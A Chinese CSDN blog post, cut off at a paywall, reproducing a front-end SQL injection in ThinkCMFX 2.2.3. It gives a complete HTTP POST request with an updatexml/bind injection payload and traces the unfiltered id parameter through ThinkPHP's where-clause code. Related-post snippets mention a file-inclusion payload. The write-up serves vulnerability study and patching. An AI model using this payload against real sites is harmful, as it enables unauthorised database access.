thinkcmfx漏洞太大_ThinkCMFX2.2.3漏洞复现

最新推荐文章于 2024-04-26 12:01:11 发布
最新推荐文章于 2024-04-26 12:01:11 发布
阅读量770 收藏
点赞数
文章标签: thinkcmfx漏洞太大
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39646405/article/details/111814555
版权

对ThinkCMFX最终版本2.2.3存在的四个漏洞进行复现

ThinkCMFX 是基于 ThinkPHP3 开发的 ,ThinkCMFX2.2.3 下载地址:https://pan.baidu.com/s/1bRXwdg

前台SQL注入

随意注册一个 普通用户 登陆后,发送如下数据包可触发 SQL注入

1

2

3

4

5

6

7

8POST /index.php?g=portal&m=article&a=edit_post HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Cookie: PHPSESSID=2894fb4dbf964f58ccf3d2e4e372b316

Host: 127.0.0.1:8000

Content-Length: 78

Connection: close

post[id][0]=bind&post[id][1]=0 and updatexml(1, concat(0x7e,user(),0x7e),1)#

漏洞文件位于 application/Portal/Controller/ArticleController.class.php

漏洞产生的本质是未对用户输入进行过滤,用户可控变量$article来源于POST传递的参数名为post的数组,再将$article的id字段 未经过滤 就直接拼接到where条件语句中查询,导致 sql注入漏洞 。下面开始跟进漏洞。

跟进到save方法后,$data参数传入update方法开始执行数据库 UPDATE 操作

然后将$options['where']传入parseWhere函数进行where条件语句的拼接,最后跟进到parseWhereItem函数

程序处理过程中使得$exp == 'bind',最后拼接成的where语句为:1WHERE `id` = :0 and updatexml(1, concat(0x7e,user(),0x7e)

最低0.47元/天 解锁文章
weixin_39646405
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkCMF X 2.2.3 SQL注入漏洞
Shen__Kong的博客
11-07 1073
漏洞2.3版本又以下,漏洞点与ArticleController.class.php edit_post方法SQL注入(CVE-2018-19898) 。 ThinkCMF X2.2.2是基于ThinkPHP 3.2.3开发的,ThinkPHP 3.x版本之前被爆出存在bind注入,这个漏洞就是ThinkPHP3.x注入的典型案例。漏洞位于前台文章编辑处,不过要复现这个漏洞点首先是要注册一个普...
记录 ThinkCMF 框架 X2.2.3 版本漏洞发现与解决
Peak Xin's Blog
03-24 718
接到网警通知,说网站有安全漏洞,根据网警提供的检测报告,经过各种尝试,终于复现了,现在记录这一激动人心的时刻。因为它的这两个方法是公用的,我们需要把它改为私用的,这样才可以不被前端的用户去任意的利用。,根据网警提供的检测报告在postman工具上操作复现漏洞情况。那找解决方法吧,升级框架肯定是不现实的,好歹是找了解决方案。网站是基于ThinkCMF框架搭建的,查看版本是。点击发送,看看结果,意不意外惊不惊喜!修复后,再次访问,解决了。
POC&EXP编写—EXP编写实战(1)
最新发布
剁椒鱼头没剁椒的博客
04-26 580
通过上一篇文章的了解,应该都了解了POC是怎么编写的,而且POC和EXP的区别就是POC只能验证漏洞,简单来说就是通过判断特定的响应值来判断是否存在漏洞,而且EXP就需要将响应的内容给返回回来,但是整体在编写的时候基本上都差不多!关于用的模块或者参数除非是前面没了解过的,否则不再进行赘述,请查看前面的文章!整体来说,当你编写一个POC或EXP后,后续的编写基本上都是套模板,除非遇到一些很复杂的漏洞,可能需要修改很多内容,否则一般的漏洞基本上就是修改模板。
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
weixin_42675091的博客
09-23 832
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
漏洞复现----ThinkCMF框架任意内容包含漏洞分析复现
wwl012345的博客
11-29 2857
0x00 简介 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。 0x01 漏洞介绍 攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 0...
ThinkCMFX2.2.3_20161213.zip
01-23
ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展,每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。 ThinkCMFX 2.2.3 更新日志:2016-12-13 * 修复后台部分浏览器无法上传问题; * 优化chrome 上传文件时,打开文件选择框慢; * 修复后台文件添加编辑相册图片移除浏览器不兼容问题; * 修复文件上传在遨游下不能上传文件问题; * 修复后台登录错误时提示无样式。
GD32F10x_Firmware_Library_V2.2.3
08-18
GD32F10X固件库文件,例程
LPC_ARM_ISP_V2.2.3.zip_微处理器开发_C/C++_
08-12
标题中的"LPC_ARM_ISP_V2.2.3.zip"是一个软件开发相关的压缩包,主要针对微处理器的开发,特别是基于LPC系列的微控制器,使用C/C++编程语言。这个版本是2.2.3,暗示这可能是一个更新或者改进的版本,包含了之前版本...
STRS-2.2.3.rar_ STRS-2.2.3_.strs_STRS-2.2.3_item.strs_strs
09-21
在标签中,"_strs-2.2.3 .strs strs-2.2.3 item.strs strs"重复提到了STRS 2.2.3和".strs"后缀的文件,这表明STRS系统可能使用这种特定的文件格式来存储或处理数据。".strs"文件可能是STRS的配置文件、规则库或者是...
jmeter_ServerAgent-2.2.3.zip
06-04
jmeter服务端监控工具 参考地址:...(1)在linux任意目录下创建一个文件夹,使用rz命令把ServerAgent-2.2.1.zip上传上去, (2)解压 命令 unzip ServerAgent-2.2.1.zip (3)解压完成后,使用./startAgent.sh 启动
ThinkCMF框架任意内容包含漏洞分析复现
m0_48520508的博客
07-29 585
0x01简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。 0x02漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特
thinkcmf最新版
05-23
ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架(CMF),我们一直秉承ThinkPHP大道至简的理念,坚持做最简约的ThinkPHP开源软件,多应用化开发方式,让您更快地...
thinkcmf-ThinkCMFX-X2.1.0
11-01
ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本
thinkcmfx漏洞太大_ThinkCMFX任意文件包含漏洞(学习)
weixin_39967120的博客
12-22 299
前言:最近爆出来的漏洞,ThinkCmfX版本应该是通杀的,基于3.X Thinkphp开发的我们就拿这个payload来进行分析http://127.0.0.1/index.php?a=fetch&content=我们要知道tp框架的特性,可以通过这种形式的路由方式进行访问相应的功能点,例如通过g\m\a参数指定分组\控制器\方法我们可以跟进父类的fetch的方法中查看发现还调用了父类的...
【组件攻击链】ThinkCMF 高危漏洞分析与利用
further_eye的博客
11-18 1260
ThinkCMF X2.x系列最大的风险存在于ThinkCMF框架中Controller中的两个模板操作函数。ThinkCMF 5系列近两年比较出名的就是CVE-2019-6713、CVE-2019-7580两个后台任意代码执行漏洞
漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 1647
【thinkcmf-文件包含】public函数
ThinkCMF 2.2.0漏洞
2301_79773660的博客
09-22 299
?>’)/shell.php?>’)
thinkcmf需要的php版本,升级指导 · ThinkCMF5开发手册 · 看云
weixin_39847722的博客
03-10 461
# 升级指导>[danger] 升级前请做好备份[TOC=2,5]## 5.0.190312升级到5.0.190419### 升级步骤1.备份数据库,和程序2.覆盖新版本到老版本3. 清除缓存## 5.0.190111升级到5.0.190312### 升级步骤1.备份数据库,和程序2.覆盖新版本到老版本3. 清除缓存### 升级注意此版本已经删除`phpoffice/phpspreadshe...
thinkcmf 渗透测试漏洞修复解决方案
网站安全资讯
11-20 973
近段时间发现很多APP程序用的是thinkcmf,此程序源码存在getshell漏洞,我们Sine安全紧急对此高危漏洞进行了分析和漏洞修复,攻击者可以通过构造特定的请求包get请求即可在远程服务器上执行任意脚本代码。 根据index.php中的配置,项目路径为application,打开 P...
office_2010_toolkit_2.2.3
06-20
office_2010_toolkit_2.2.3是一款用于安装、激活或卸载微软Office 2010的工具包。它可以帮助用户在可接受的时间和成本范围内完成Office 2010的安装和激活,使用户能够畅享Office 2010的完整功能。此外,它还具有深度...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值